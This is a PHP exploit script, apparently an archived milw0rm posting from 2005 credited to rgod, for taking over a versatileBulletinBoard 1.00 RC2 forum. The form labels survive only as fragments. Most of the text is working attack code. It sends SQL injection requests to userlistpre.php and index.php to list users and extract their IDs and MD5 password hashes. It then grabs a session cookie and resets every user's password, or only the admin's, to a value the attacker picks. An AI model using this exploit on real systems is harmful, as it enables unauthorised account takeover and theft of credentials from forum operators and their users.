versatileBulletinBoard 1.00 RC2 (possibly prior versions) SQL injection / board takeover

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex:/versatile/ or /forum/ or just /)

specify a port other than 80 (default value)

usually vbb (default value) or vbb_

new password for all users! ;)

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.htmlentities($host).'...'; die; }} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($newpass<>'') and ($table_prefix<>'')) { if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} #STEP 1 -> List all users... $packet="GET ".$p."userlistpre.php?list='%20or%20isnull(1/0)/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: HeinrichderMiragoRobot\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); if (!eregi("200 OK",$html)) {echo '
Exploit failed... nothing here...'; } $magic_q=0; if (!eregi('
',$html)) {echo '
It seems we have magic_quote_gpc On here...let\'s try to reset only admin password...'; $magic_q=1; } if (!$magic_q) { $users=explode('
',$html); $temp=explode(' ',$users[0]); $users[0]=$temp[count($temp)-1]; for ($i=0; $i<=count($users)-1; $i++) //each user... { if (!eregi('anonymous',$users[$i]) and !eregi('deleted',$users[$i]) and !eregi(chr(0x0d),$users[$i])) // default users, eof... { echo '
'.htmlentities($users[$i]).'
'; #STEP 2 -> retrieve user ID for user $users($i) $packet="GET ".$p."index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID"; $packet.=",ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20".$table_prefix; $packet.="_user%20where%20name='".$users[$i]."'/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: FFC Trap Door Spider\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("subject: ",$html); $temp2=explode("<",$temp[1]); $uid=$temp2[0]; echo "
UID -> ".htmlentities($uid); #STEP 3 -> retrieve MD5 password hash for user $users($i) $packet="GET ".$p."index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass"; $packet.=",pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass"; $packet.=",pass%20FROM%20".$table_prefix."_user%20where%20name='".$users[$i]."'/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Irvine/1.x.x\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("subject: ",$html); $temp2=explode("<",$temp[1]); $hash=$temp2[0]; echo "
hash -> ".htmlentities($hash); #STEP 4 -> go to reset password panel and retrieve a session cookie $packet="GET ".$p."index.php?target=setpass&u=".$uid."&ph=".$hash." HTTP/1.1\r\n"; $packet.="User-Agent: libwww-perl/5.53\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]."path=/"; echo'
cookie: -> '.htmlentities($cookie).'

'; #STEP 5 -> reset the passoword to $newpass... $newpass=urlencode($newpass); $data="send=true&uid=".$uid."&newpass=".$newpass; $packet="POST ".$p."index.php?target=setpass HTTP/1.1\r\n"; $packet.="User-Agent: W3C_Validator/1.xxx libwww-perl/5.xx\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.":".$port.$path."index.php?target=setpass&u=".$uid."&ph=".$hash."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("password changed",$html)) {echo "
Exploit successful...login with username: ".htmlentities($users[$i])." and password: ".htmlentities($newpass)."
"; echo "
Remember to reset your cookies...
";} else {echo "
Exploit failed, something goes wrong or maybe you're Britney Spears ...";} }}} else { #STEP 2b -> reset only admin passoword to $newpass... $newpass=urlencode($newpass); $data="send=true&uid=11&newpass=".$newpass; $packet="POST ".$p."index.php?target=setpass HTTP/1.1\r\n"; $packet.="User-Agent: W3C_Validator/1.xxx libwww-perl/5.xx\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.":".$port.$path."index.php?target=setpass&u=11&ph=\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("password changed",$html)) {echo "
Exploit successful...look for admin username and login with password: ".htmlentities($newpass)."
"; } else {echo "
Exploit failed, something goes wrong or maybe you're Britney Spears ...";} } } else {echo '
Fill in requested fields, optionally specify a proxy...';} ?> # milw0rm.com [2005-10-10]